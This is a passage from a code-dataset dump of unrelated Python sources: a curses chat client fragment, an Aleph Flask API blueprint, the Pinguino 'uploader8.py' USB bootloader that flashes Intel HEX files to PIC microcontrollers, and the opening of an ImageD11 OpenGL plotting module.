global listenerConnection
key = ''
while not closing:
key = screen.getch()
if key == curses.KEY_END:
closing = True
elif key == ord('\n'):
sending = True
elif key == curses.KEY_BACKSPACE:
tosend = tosend[:-1]
elif key == curses.KEY_F5:
connect()
elif key == curses.KEY_F6:
disconnecting = True
log("connection closed _ listener", 2)
elif key <= 256:
tosend += chr(key)
def connect():
global server_address
global promoterPort
global listenerPort
global uuid
global disconnecting
disconnecting = False
start_new_thread(startPromoter, (server_address, promoterPort,))
while uuid == "":
time.sleep(1)
log("connect with uuid: " + str(uuid), 20)
log("prepare listener start", 120)
start_new_thread(startListener, (server_address, listenerPort,))
def Main():
global closing
global tosend
global uuid
global listenerConnection
global promoterConnection
start_new_thread(printScreen, ())
start_new_thread(checkKeyboard, ())
connect()
while not closing:
pass
time.sleep(1)
listenerConnection.close()
promoterConnection.close()
curses.endwin()
Main()
| gpl-3.0 | -7,801,153,503,613,307,000 | 18.515267 | 91 | 0.672599 | false | 2.970947 | false | false | false |
OpenOil-UG/aleph | aleph/views/base_api.py | 1 | 3171 | import os
import logging
from time import time
from apikit import jsonify
from flask import render_template, current_app, Blueprint, request
from jsonschema import ValidationError
from elasticsearch import TransportError
from aleph.core import get_config
from aleph.model.constants import CORE_FACETS, SOURCE_CATEGORIES
from aleph.model.constants import COUNTRY_NAMES, LANGUAGE_NAMES
from aleph.model.validation import resolver
from aleph.views.cache import enable_cache
blueprint = Blueprint('base_api', __name__)
log = logging.getLogger(__name__)
def angular_templates():
templates = {}
template_dirs = [current_app.static_folder]
template_dirs.extend(get_config('CUSTOM_TEMPLATES_DIR'))
for template_dir in template_dirs:
for tmpl_set in ['templates', 'help']:
tmpl_dir = os.path.join(template_dir, tmpl_set)
for (root, dirs, files) in os.walk(tmpl_dir):
for file_name in files:
file_path = os.path.join(root, file_name)
with open(file_path, 'rb') as fh:
file_name = file_path[len(template_dir) + 1:]
templates[file_name] = fh.read().decode('utf-8')
return templates.items()
@blueprint.route('/search')
@blueprint.route('/help')
@blueprint.route('/help/<path:path>')
@blueprint.route('/entities')
@blueprint.route('/entities/<path:path>')
@blueprint.route('/crawlers')
@blueprint.route('/crawlers/logs')
@blueprint.route('/tabular/<path:path>')
@blueprint.route('/text/<path:path>')
@blueprint.route('/')
def ui(**kwargs):
enable_cache(server_side=True)
return render_template("layout.html", templates=angular_templates())
@blueprint.route('/api/1/metadata')
def metadata():
enable_cache(server_side=False)
schemata = {}
for schema_id, schema in resolver.store.items():
if not schema_id.endswith('#'):
schema_id = schema_id + '#'
schemata[schema_id] = {
'id': schema_id,
'title': schema.get('title'),
'faIcon': schema.get('faIcon'),
'plural': schema.get('plural', schema.get('title')),
'description': schema.get('description'),
'inline': schema.get('inline', False)
}
return jsonify({
'status': 'ok',
'fields': CORE_FACETS,
'source_categories': SOURCE_CATEGORIES,
'countries': COUNTRY_NAMES,
'languages': LANGUAGE_NAMES,
'schemata': schemata
})
@blueprint.app_errorhandler(403)
def handle_authz_error(err):
return jsonify({
'status': 'error',
'message': 'You are not authorized to do this.',
'roles': request.auth_roles,
'user': request.auth_role
}, status=403)
@blueprint.app_errorhandler(ValidationError)
def handle_validation_error(err):
return jsonify({
'status': 'error',
'message': err.message
}, status=400)
@blueprint.app_errorhandler(TransportError)
def handle_es_error(err):
return jsonify({
'status': 'error',
'message': err.error,
'info': err.info.get('error', {}).get('root_cause', [])[-1]
}, status=400)
| mit | -845,400,836,799,092,400 | 31.030303 | 72 | 0.629454 | false | 3.691502 | false | false | false |
PinguinoIDE/pinguino-bootloaders | p8/usb/v5.x/tools/uploader8.py | 2 | 32716 | #!/usr/bin/env python
#-*- coding: iso-8859-15 -*-
"""---------------------------------------------------------------------
_____ _____ _ _ _____ _ _ _____ _ _ ____
| __ \_ _| \ | |/ ____| | | |_ _| \ | |/ __ \
| |__) || | | \| | | __| | | | | | | \| | | | |
| ___/ | | | . ` | | |_ | | | | | | | . ` | | | |
| | _| |_| |\ | |__| | |__| |_| |_| |\ | |__| |
|_| _|_____|_| \_|\_____|\____/|_____|_| \_|\____/
| | | | | |
___| |_ __ _ _ __ __| | __ _| | ___ _ __ ___
/ __| __/ _` | '_ \ / _` |/ _` | |/ _ \| '_ \ / _ \
\__ \ || (_| | | | | (_| | (_| | | (_) | | | | __/
|___/\__\__,_|_| |_|\__,_|\__,_|_|\___/|_| |_|\___|
___ _ _ _ _ _ _ _
/ _ \ | | (_) | | | | | | | | |
| (_) |_____| |__ _| |_ | | | |_ __ | | ___ __ _ __| | ___ _ __
> _ <______| '_ \| | __| | | | | '_ \| |/ _ \ / _` |/ _` |/ _ \ '__|
| (_) | | |_) | | |_ | |__| | |_) | | (_) | (_| | (_| | __/ |
\___/ |_.__/|_|\__| \____/| .__/|_|\___/ \__,_|\__,_|\___|_|
| |
|_|
Author: Regis Blanchot <[email protected]>
--------------------------------------------------------------------
2013-11-13 - RB - first release
2015-09-08 - RB - fixed numBlocks > numBlocksMax when used with XC8
2016-08-27 - RB - added PIC16F145x support
2016-08-28 - RB - added Python3 support
2016-08-29 - RB - added usb.core functions (PYUSB_USE_CORE)
2016-11-23 - RB - changed constant writeBlockSize to variable writeBlockSize
--------------------------------------------------------------------
This library is free software you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the
Free Software Foundation, Inc.
51 Franklin Street, Fifth Floor
Boston, MA 02110-1301 USA
---------------------------------------------------------------------"""
#-----------------------------------------------------------------------
# Usage: uploader8.py mcu path/filename.hex
# Ex : uploader8.py 16F1459 tools/Blink1459.hex
#-----------------------------------------------------------------------
# This class is based on :
# - Diolan USB bootloader licenced (LGPL) by Diolan <http://www.diolan.com>
# - jallib USB bootloader licenced (BSD) by Albert Faber
# See also PyUSB Doc. http://wiki.erazor-zone.de/wiki:projects:python:pyusb:pydoc
# Pinguino Device Descriptors : lsusb -v -d 04d8:feaa
#-----------------------------------------------------------------------
# Debug: export PYUSB_DEBUG=debug
#-----------------------------------------------------------------------
import sys
import os
import usb
#import usb.core
#import usb.util
# PyUSB Core module switch
#-----------------------------------------------------------------------
PYUSB_USE_CORE = 1 # 0=legacy, 1=core
# Globales
#-----------------------------------------------------------------------
# 8-bit Pinguino's ID
#-----------------------------------------------------------------------
VENDOR_ID = 0x04D8 # Microchip License
PRODUCT_ID = 0xFEAA # Pinguino Sub-License
# Hex format record types
#-----------------------------------------------------------------------
Data_Record = 0
End_Of_File_Record = 1
Extended_Segment_Address_Record = 2
Start_Segment_Address_Record = 3
Extended_Linear_Address_Record = 4
Start_Linear_Address_Record = 5
# usbBuf Data Packet Structure
#-----------------------------------------------------------------------
# __________________
# | COMMAND | 0 [BOOT_CMD]
# | LEN/SIZE | 1 [BOOT_CMD_LEN] or [BOOT_SIZE]
# | ADDRL | 2 [BOOT_ADDR_LO] or [BOOT_VER_MINOR]
# | ADDRH | 3 [BOOT_ADDR_HI] or [BOOT_VER_MAJOR ]
# | ADDRU | 4 [BOOT_ADDR_UP]
# | | 5 [BOOT_DATA_START] or [BOOT_DEV1] or [BOOT_REV1]
# | | 6 [BOOT_DEV2] or [BOOT_REV2]
# . .
# . DATA .
# . .
# | | 62
# |________________| 63
#
#-----------------------------------------------------------------------
BOOT_CMD = 0
BOOT_CMD_LEN = 1
BOOT_ADDR_LO = 2
BOOT_ADDR_HI = 3
BOOT_ADDR_UP = 4
BOOT_DATA_START = 5
BOOT_SIZE = 1
BOOT_VER_MINOR = 2
BOOT_VER_MAJOR = 3
BOOT_REV1 = 5
BOOT_REV2 = 6
BOOT_DEV1 = 7
BOOT_DEV2 = 8
# Bootloader commands
#-----------------------------------------------------------------------
READ_VERSION_CMD = 0x00
READ_FLASH_CMD = 0x01
WRITE_FLASH_CMD = 0x02
ERASE_FLASH_CMD = 0x03
#READ_EEDATA_CMD = 0x04
#WRITE_EEDATA_CMD = 0x05
#READ_CONFIG_CMD = 0x06
#WRITE_CONFIG_CMD = 0x07
RESET_CMD = 0xFF
# USB Max. Packet size
#-----------------------------------------------------------------------
MAXPACKETSIZE = 64
# Bulk endpoints
#-----------------------------------------------------------------------
IN_EP = 0x81 # endpoint for Bulk reads
OUT_EP = 0x01 # endpoint for Bulk writes
# Configuration
#-----------------------------------------------------------------------
ACTIVE_CONFIG = 0x01
INTERFACE_ID = 0x00
TIMEOUT = 10000
# Error codes returned by various functions
#-----------------------------------------------------------------------
ERR_NONE = 0
ERR_CMD_ARG = 1
ERR_CMD_UNKNOWN = 2
ERR_DEVICE_NOT_FOUND = 3
ERR_USB_INIT1 = 4
ERR_USB_INIT2 = 5
ERR_USB_OPEN = 6
ERR_USB_WRITE = 7
ERR_USB_READ = 8
ERR_HEX_OPEN = 9
ERR_HEX_STAT = 10
ERR_HEX_MMAP = 11
ERR_HEX_SYNTAX = 12
ERR_HEX_CHECKSUM = 13
ERR_HEX_RECORD = 14
ERR_VERIFY = 15
ERR_EOL = 16
ERR_USB_ERASE = 17
# Table with supported USB devices
# device_id:[PIC name, flash size(in bytes), eeprom size (in bytes)]
#-----------------------------------------------------------------------
devices_table = \
{
# 16F
0x3020: ['16f1454' , 0x02000, 0x00 ],
0x3021: ['16f1455' , 0x02000, 0x00 ],
0x3023: ['16f1459' , 0x02000, 0x00 ],
0x3024: ['16lf1454' , 0x02000, 0x00 ],
0x3025: ['16lf1455' , 0x02000, 0x00 ],
0x3027: ['16lf1459' , 0x02000, 0x00 ],
# 18F
0x4740: ['18f13k50' , 0x02000, 0x80 ],
0x4700: ['18lf13k50' , 0x02000, 0x80 ],
0x4760: ['18f14k50' , 0x04000, 0xff ],
0x4720: ['18f14k50' , 0x04000, 0xff ],
0x2420: ['18f2450' , 0x04000, 0x00 ],
0x1260: ['18f2455' , 0x06000, 0xff ],
0x2a60: ['18f2458' , 0x06000, 0xff ],
0x4c00: ['18f24j50' , 0x04000, 0x00 ],
0x4cc0: ['18lf24j50' , 0x04000, 0x00 ],
0x1240: ['18f2550' , 0x08000, 0xff ],
0x2a40: ['18f2553' , 0x08000, 0xff ],
0x4c20: ['18f25j50' , 0x08000, 0x00 ],
0x4ce0: ['18lf25j50' , 0x08000, 0x00 ],
0x5c20: ['18f25k50' , 0x08000, 0xff ],
0x5ca0: ['18lf25k50' , 0x08000, 0xff ],
0x4c40: ['18f26j50' , 0x10000, 0x00 ],
0x4d00: ['18lf26j50' , 0x10000, 0x00 ],
0x5860: ['18f27j53' , 0x20000, 0x00 ],
0x1200: ['18f4450' , 0x04000, 0x00 ],
0x1220: ['18f4455' , 0x06000, 0x00 ],
0x2a20: ['18f4458' , 0x06000, 0xff ],
0x4c60: ['18f44j50' , 0x04000, 0x00 ],
0x4d20: ['18lf44j50' , 0x04000, 0x00 ],
0x1200: ['18f4550' , 0x08000, 0xff ],
0x2a00: ['18f4553' , 0x08000, 0xff ],
0x4c80: ['18f45j50' , 0x08000, 0x00 ],
0x4d40: ['18lf45j50' , 0x08000, 0x00 ],
0x5C00: ['18f45k50' , 0x08000, 0xff ],
0x5C80: ['18lf45k50' , 0x08000, 0xff ],
0x4ca0: ['18f46j50' , 0x10000, 0x00 ],
0x4d60: ['18f46j50' , 0x10000, 0x00 ],
0x58e0: ['18f47j53' , 0x20000, 0x00 ],
0x4100: ['18f65j50' , 0x08000, 0x00 ],
0x1560: ['18f66j50' , 0x10000, 0x00 ],
0x4160: ['18f66j55' , 0x18000, 0x00 ],
0x4180: ['18f67j50' , 0x20000, 0x00 ],
0x41a0: ['18f85j50' , 0x08000, 0x00 ],
0x41e0: ['18f86j50' , 0x10000, 0x00 ],
0x1f40: ['18f86j55' , 0x18000, 0x00 ],
0x4220: ['18f87j50' , 0x20000, 0x00 ]
}
# ----------------------------------------------------------------------
def getDevice(vendor, product):
# ----------------------------------------------------------------------
""" search USB device and returns a DeviceHandle object """
if PYUSB_USE_CORE:
device = usb.core.find(idVendor=vendor, idProduct=product)
#print(device)
if device is None :
return ERR_DEVICE_NOT_FOUND
else :
return device
else:
busses = usb.busses()
for bus in busses:
#print(bus)
for device in bus.devices:
#print(device)
if (device.idVendor, device.idProduct) == (vendor, product):
return device
return ERR_DEVICE_NOT_FOUND
# ----------------------------------------------------------------------
def initDevice(device):
# ----------------------------------------------------------------------
""" init pinguino device """
if PYUSB_USE_CORE:
if os.getenv("PINGUINO_OS_NAME") == "linux":
try:
active = device.is_kernel_driver_active(INTERFACE_ID)
except usb.core.USBError as e:
sys.exit("Aborting: could not detach kernel driver: %s" % str(e))
if active :
#print("Kernel driver detached")
try:
device.detach_kernel_driver(INTERFACE_ID)
except usb.core.USBError as e:
sys.exit("Aborting: could not detach kernel driver: %s" % str(e))
#else:
#print("No kernel driver attached")
# The call to set_configuration must come before
# claim_interface (which, btw, is optional).
try:
device.set_configuration(ACTIVE_CONFIG)
except usb.core.USBError as e:
sys.exit("Aborting: could not set configuration: %s" % str(e))
try:
usb.util.claim_interface(device, INTERFACE_ID)
except usb.core.USBError as e:
sys.exit("Aborting: could not claim interface: %s" % str(e))
return device
else:
handle = device.open()
if handle:
#print(handle)
try:
handle.detachKernelDriver(INTERFACE_ID)
except:
#print("Could not detatch kernel driver from interface")
pass
try:
handle.setConfiguration(ACTIVE_CONFIG)
except:
sys.exit("Aborting: could not set configuration")
try:
handle.claimInterface(INTERFACE_ID)
except:
#print("Could not claim interface")
pass
return handle
return ERR_USB_INIT1
# ----------------------------------------------------------------------
def closeDevice(handle):
# ----------------------------------------------------------------------
""" Close currently-open USB device """
if PYUSB_USE_CORE:
usb.util.release_interface(handle, INTERFACE_ID)
else:
handle.releaseInterface()
# ----------------------------------------------------------------------
def sendCommand(handle, usbBuf):
# ----------------------------------------------------------------------
""" send command to the bootloader """
if PYUSB_USE_CORE:
sent_bytes = handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
sent_bytes = handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
if sent_bytes != len(usbBuf):
return ERR_USB_WRITE
if PYUSB_USE_CORE:
return handle.read(IN_EP, MAXPACKETSIZE, TIMEOUT)
else:
return handle.bulkRead(IN_EP, MAXPACKETSIZE, TIMEOUT)
# ----------------------------------------------------------------------
def resetDevice(handle):
# ----------------------------------------------------------------------
""" send reset command to the bootloader """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = RESET_CMD
# write data packet
if PYUSB_USE_CORE:
handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
#usbBuf = sendCommand(handle, usbBuf)
#print usbBuf
#handle.reset()
# ----------------------------------------------------------------------
def getVersion(handle):
# ----------------------------------------------------------------------
""" get bootloader version """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = READ_VERSION_CMD
# write data packet and get response
usbBuf = sendCommand(handle, usbBuf)
if usbBuf == ERR_USB_WRITE:
return ERR_USB_WRITE
else:
# major.minor
return str(usbBuf[BOOT_VER_MAJOR]) + "." + \
str(usbBuf[BOOT_VER_MINOR])
# ----------------------------------------------------------------------
def getDeviceID(handle, proc):
# ----------------------------------------------------------------------
""" read 2-byte device ID from
PIC18F : 0x3FFFFE
PIC16F : 0x8005 """
#print(proc)
if ("16f" in proc):
# REVISION & DEVICE ID
usbBuf = readFlash(handle, 0x8005, 4)
if usbBuf == ERR_USB_WRITE or usbBuf is None:
return ERR_USB_WRITE, ERR_USB_WRITE
rev1 = usbBuf[BOOT_REV1]
rev2 = usbBuf[BOOT_REV2]
device_rev = (int(rev2) << 8) + int(rev1)
dev1 = usbBuf[BOOT_DEV1]
dev2 = usbBuf[BOOT_DEV2]
device_id = (int(dev2) << 8) + int(dev1)
else:
# REVISION & DEVICE ID
usbBuf = readFlash(handle, 0x3FFFFE, 2)
#print usbBuf
if usbBuf == ERR_USB_WRITE or usbBuf is None:
return ERR_USB_WRITE, ERR_USB_WRITE
#print("BUFFER =", usbBuf
dev1 = usbBuf[BOOT_REV1]
#print("DEV1 =", dev1
dev2 = usbBuf[BOOT_REV2]
#print("DEV2 =", dev2
device_id = (int(dev2) << 8) + int(dev1)
device_id = device_id & 0xFFE0
#print device_id
device_rev = device_id & 0x001F
#print device_rev
return device_id, device_rev
# ----------------------------------------------------------------------
def getDeviceFlash(device_id):
# ----------------------------------------------------------------------
""" get flash memory info """
for n in devices_table:
if n == device_id:
return devices_table[n][1]
return ERR_DEVICE_NOT_FOUND
# ----------------------------------------------------------------------
def getDeviceName(device_id):
# ----------------------------------------------------------------------
""" get device chip name """
for n in devices_table:
if n == device_id:
return devices_table[n][0]
return ERR_DEVICE_NOT_FOUND
# ----------------------------------------------------------------------
def eraseFlash(handle, address, numBlocks):
# ----------------------------------------------------------------------
""" erase n * 64- or 1024-byte blocks of flash memory """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = ERASE_FLASH_CMD
# number of blocks to erase
usbBuf[BOOT_SIZE] = numBlocks
# 1rst block address
# NB : must be divisible by 64 or 1024 depending on PIC model
usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF
usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF
usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF
# write data packet
if PYUSB_USE_CORE:
handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
#return sendCommand(handle, usbBuf)
# ----------------------------------------------------------------------
def readFlash(handle, address, length):
# ----------------------------------------------------------------------
""" read a block of flash """
usbBuf = [0] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = READ_FLASH_CMD
# size of block
usbBuf[BOOT_CMD_LEN] = length
# address
usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF
usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF
usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF
# send request to the bootloader
return sendCommand(handle, usbBuf)
# ----------------------------------------------------------------------
def writeFlash(handle, address, datablock):
# ----------------------------------------------------------------------
""" write a block of code
first 5 bytes are for block description
(BOOT_CMD, BOOT_CMD_LEN and BOOT_ADDR)
data block size should be of writeBlockSize bytes
total length is then writeBlockSize + 5 < MAXPACKETSIZE """
usbBuf = [0xFF] * MAXPACKETSIZE
# command code
usbBuf[BOOT_CMD] = WRITE_FLASH_CMD
# size of block
usbBuf[BOOT_CMD_LEN] = len(datablock)
# block's address
usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF
usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF
usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF
# add data to the packet
#for i in range(len(datablock)):
# usbBuf[BOOT_DATA_START + i] = datablock[i]
usbBuf[BOOT_DATA_START:] = datablock
#print usbBuf
# write data packet on usb device
if PYUSB_USE_CORE:
handle.write(OUT_EP, usbBuf, TIMEOUT)
else:
handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT)
#return sendCommand(handle, usbBuf)
# ----------------------------------------------------------------------
def hexWrite(handle, filename, proc, memstart, memend):
# ----------------------------------------------------------------------
""" Parse the Hex File Format and send data to usb device
[0] Start code, one character, an ASCII colon ':'.
[1:3] Byte count, two hex digits.
[3:7] Address, four hex digits, a 16-bit address of the beginning
of the memory position for the data. Limited to 64 kilobytes,
the limit is worked around by specifying higher bits via
additional record types. This address is big endian.
[7:9] Record type, two hex digits, 00 to 05, defining the type of
the data field.
[9:*] Data, a sequence of n bytes of the data themselves,
represented by 2n hex digits.
[*:*] Checksum, two hex digits - the least significant byte of the
two's complement of the sum of the values of all fields
except fields 1 and 6 (Start code ":" byte and two hex digits
of the Checksum). It is calculated by adding together the
hex-encoded bytes (hex digit pairs), then leaving only the
least significant byte of the result, and making a 2's
complement (either by subtracting the byte from 0x100,
or inverting it by XOR-ing with 0xFF and adding 0x01).
If you are not working with 8-bit variables,
you must suppress the overflow by AND-ing the result with
0xFF. The overflow may occur since both 0x100-0 and
(0x00 XOR 0xFF)+1 equal 0x100. If the checksum is correctly
calculated, adding all the bytes (the Byte count, both bytes
in Address, the Record type, each Data byte and the Checksum)
together will always result in a value wherein the least
significant byte is zero (0x00).
For example, on :0300300002337A1E
03 + 00 + 30 + 00 + 02 + 33 + 7A = E2, 2's complement is 1E
"""
# Addresses are doubled in the PIC16F HEX file
if ("16f" in proc):
memstart = memstart * 2
memend = memend * 2
#print("memstart = 0x%X" % memstart)
#print("memend = 0x%X" % memend)
data = []
old_max_address = memstart
old_min_address = memend
max_address = 0
min_address = 0
address_Hi = 0
codesize = 0
# size of write block
# ------------------------------------------------------------------
if "13k50" in proc :
writeBlockSize = 8
elif "14k50" in proc :
writeBlockSize = 16
else :
writeBlockSize = 32
# size of erase block
# --------------------------------------------------------------
# Pinguino x6j50 or x7j53, erased blocks are 1024-byte long
if ("j" in proc):
eraseBlockSize = 1024
# Pinguino x455, x550 or x5k50, erased blocks are 64-byte long
else:
eraseBlockSize = 64
#print("eraseBlockSize = %d" % eraseBlockSize
# image of the whole PIC memory (above memstart)
# --------------------------------------------------------------
for i in range(memend - memstart):
data.append(0xFF)
# read hex file
# ------------------------------------------------------------------
hexfile = open(filename,'r')
lines = hexfile.readlines()
hexfile.close()
# calculate checksum, code size and memmax
# ------------------------------------------------------------------
for line in lines:
byte_count = int(line[1:3], 16)
# lower 16 bits (bits 0-15) of the data address
address_Lo = int(line[3:7], 16)
record_type= int(line[7:9], 16)
# checksum calculation (optional if speed is critical)
end = 9 + byte_count * 2 # position of checksum at end of line
checksum = int(line[end:end+2], 16)
cs = 0
i = 1
while i < end:
cs = cs + (0x100 - int(line[i:i+2], 16) ) & 0xFF # not(i)
i = i + 2
if checksum != cs:
return ERR_HEX_CHECKSUM
# extended linear address record
if record_type == Extended_Linear_Address_Record:
# upper 16 bits (bits 16-31) of the data address
address_Hi = int(line[9:13], 16) << 16
#print address_Hi
# data record
elif record_type == Data_Record:
# data's 32-bit address calculation
address = address_Hi + address_Lo
#print("address = %X" % address
# min address
if (address < old_min_address) and (address >= memstart):
min_address = address
old_min_address = address
#print("min. address : 0x%X" % old_min_address
# max address
if (address > old_max_address) and (address < memend):
max_address = address + byte_count
old_max_address = address
#print("end_address = %X" % end_address
if (address >= memstart) and (address < memend):
# code size calculation
codesize = codesize + byte_count
# append data
for i in range(byte_count):
if ((address + i) < memend):
#Caution : addresses are not always contiguous
#data.append(int(line[9 + (2 * i) : 11 + (2 * i)], 16))
#data[address - memstart + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16)
data[address - min_address + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16)
#print line[9 + (2 * i) : 11 + (2 * i)],
# end of file record
elif record_type == End_Of_File_Record:
break
# unsupported record type
else:
return ERR_HEX_RECORD
# max_address must be divisible by eraseBlockSize
# ------------------------------------------------------------------
#min_address = min_address - eraseBlockSize - (min_address % eraseBlockSize)
max_address = max_address + eraseBlockSize - (max_address % eraseBlockSize)
if (max_address > memend):
max_address = memend
#print("min_address = 0x%X" % min_address
#print("max_address = 0x%X" % max_address
# erase memory from memstart to max_address
# ------------------------------------------------------------------
numBlocksMax = (memend - memstart) / eraseBlockSize
numBlocks = (max_address - memstart) / eraseBlockSize
#print("memend = %d" % memend
#print("memmax = %d" % memmax
#print("memstart = %d" % memstart
#print("numBlocks = %d" % numBlocks
#print("numBlocksMax = %d" % numBlocksMax
if numBlocks > numBlocksMax:
#numBlocks = numBlocksMax
return ERR_USB_ERASE
if numBlocks < 256:
status = eraseFlash(handle, memstart, numBlocks)
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
else:
numBlocks = numBlocks - 255
upperAddress = memstart + 255 * eraseBlockSize
# from self.board.memstart to upperAddress
status = eraseFlash(handle, memstart, 255)
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
# erase flash memory from upperAddress to memmax
status = eraseFlash(handle, upperAddress, numBlocks)
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
# write blocks of writeBlockSize bytes
# ------------------------------------------------------------------
for addr8 in range(min_address, max_address, writeBlockSize):
index = addr8 - min_address
# the addresses are doubled in the PIC16F HEX file
if ("16f" in proc):
addr16 = addr8 / 2
status = writeFlash(handle, addr16, data[index:index+writeBlockSize])
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
#print("addr8=0x%X addr16=0x%X" % (addr8, addr16)
#print("0x%X [%s]" % (addr16, data[index:index+writeBlockSize])
else:
status = writeFlash(handle, addr8, data[index:index+writeBlockSize])
if status == ERR_USB_WRITE:
return ERR_USB_WRITE
#print("0x%X [%s]" % (addr8, data[index:index+writeBlockSize])
data[:] = [] # clear the list
print("%d bytes written" % codesize)
return ERR_NONE
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
def main(mcu, filename):
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# check file to upload
# ------------------------------------------------------------------
if filename == '':
closeDevice(handle)
sys.exit("Aborting: no program to write")
hexfile = open(filename, 'r')
if hexfile == "":
sys.exit("Aborting: unable to open %s" % filename)
hexfile.close()
# search for a Pinguino board
# ------------------------------------------------------------------
print("Looking for a Pinguino board ...")
device = getDevice(VENDOR_ID, PRODUCT_ID)
if device == ERR_DEVICE_NOT_FOUND:
sys.exit("Aborting: Pinguino not found. Is your device connected and/or in bootloader mode ?")
else:
print("Pinguino found ...")
handle = initDevice(device)
#print(handle)
if handle == ERR_USB_INIT1:
print("... but upload is not possible.")
print("Press the Reset button and try again.")
sys.exit(0)
# find out the processor
# ------------------------------------------------------------------
mcu = mcu.lower()
device_id, device_rev = getDeviceID(handle, mcu)
if device_id == ERR_USB_WRITE:
closeDevice(handle)
sys.exit("Aborting: unknown device ID")
proc = getDeviceName(device_id)
if proc == ERR_DEVICE_NOT_FOUND:
closeDevice(handle)
sys.exit("Aborting: unknown PIC (id=0x%X)" % device_id)
elif proc != mcu:
closeDevice(handle)
sys.exit("Aborting: program compiled for %s but device has %s" % (mcu, proc))
else:
print(" - with PIC%s (id=0x%X, rev=%x)" % (proc, device_id, device_rev))
# find out flash memory size
# ------------------------------------------------------------------
# lower limit of the flash memory (bootloader offset)
# TODO : get it from the bootloader (cf. APPSTART)
if ("16f" in proc):
memstart = 0x800
else:
memstart = 0xC00
# upper limit of the flash memory
memend = getDeviceFlash(device_id)
memfree = memend - memstart;
print(" - with %d bytes free (%.2f/%d KB)" % (memfree, memfree/1024, memend/1024))
print(" from 0x%05X to 0x%05X" % (memstart, memend))
# find out bootloader version
# ------------------------------------------------------------------
#product = handle.getString(device.iProduct, 30)
#manufacturer = handle.getString(device.iManufacturer, 30)
print(" - with USB bootloader v%s" % getVersion(handle))
# start writing
# ------------------------------------------------------------------
print("Uploading user program ...")
status = hexWrite(handle, filename, proc, memstart, memend)
#print status
if status == ERR_HEX_RECORD:
closeDevice(handle)
sys.exit("Aborting: record error")
elif status == ERR_HEX_CHECKSUM:
closeDevice(handle)
sys.exit("Aborting: checksum error")
elif status == ERR_USB_ERASE:
print("Aborting: erase error")
closeDevice(handle)
sys.exit(0)
elif status == ERR_NONE:
print("%s successfully uploaded" % os.path.basename(filename))
# reset and start start user's app.
# ------------------------------------------------------------------
resetDevice(handle)
# Device can't be closed because it just has been reseted
#closeDevice(handle)
sys.exit("Starting user program ...")
else:
sys.exit("Aborting: unknown error")
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
# ----------------------------------------------------------------------
if __name__ == "__main__":
print("We use Python v%d.%d + PyUSB.%s" %
(sys.version_info[0],
sys.version_info[1],
"core" if PYUSB_USE_CORE else "legacy"))
i = -1
for arg in sys.argv:
i = i + 1
if i == 2:
main(sys.argv[1], sys.argv[2])
else:
sys.exit("Usage ex: uploader8.py 16f1459 tools/Blink1459.hex")
| gpl-2.0 | -3,979,081,066,942,806,500 | 36.135074 | 102 | 0.447671 | false | 3.917146 | true | false | false |
jonwright/ImageD11 | ImageD11/tkGui/plot3d.py | 1 | 11957 | #!/usr/bin/env python
from __future__ import print_function
"""
from example by Tarn Weisner Burton <[email protected]> in pyopengl
"""
__author__ = 'Jon Wright <[email protected]> from example by Tarn Weisner Burton <[email protected]>'
import numpy
import sys
import os
from pyopengltk import Opengl
import OpenGL.GL as GL
import OpenGL.GLU as GLU
if sys.version_info[0] < 3:
import Tkinter as Tk
else:
import tkinter as Tk
class myOpengl(Opengl):
# Make a parallel projection
# mostly copied from Tk.Opengl class with small mods
def tkRedraw(self, *dummy):
"""Cause the opengl widget to redraw itself."""
if not self.initialised:
return
self.activate()
#print self.distance
GL.glPushMatrix() # Protect our matrix
self.update_idletasks()
self.activate()
w = self.winfo_width()
h = self.winfo_height()
GL.glViewport(0, 0, w, h)
# Clear the background and depth buffer.
GL.glClearColor(self.r_back, self.g_back, self.b_back, 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glMatrixMode(GL.GL_PROJECTION)
GL.glLoadIdentity()
r = 1.*w/h
GL.glOrtho( -self.distance*r, self.distance*r, -self.distance, self.distance,
-self.distance*3, self.distance*3)
# GLU.gluPerspective(self.fovy, float(w)/float(h), self.near, self.far)
GL.glMatrixMode(GL.GL_MODELVIEW)
self.redraw(self)
GL.glFlush() # Tidy up
GL.glPopMatrix() # Restore the matrix
# self.tk.call(self._w, 'swapbuffers')
self.tkSwapBuffers()
class plot3d(Tk.Toplevel):
def __init__(self,parent,data=None,lines=None,
ubis=None,image=None,pars=None,spline=None):
"""
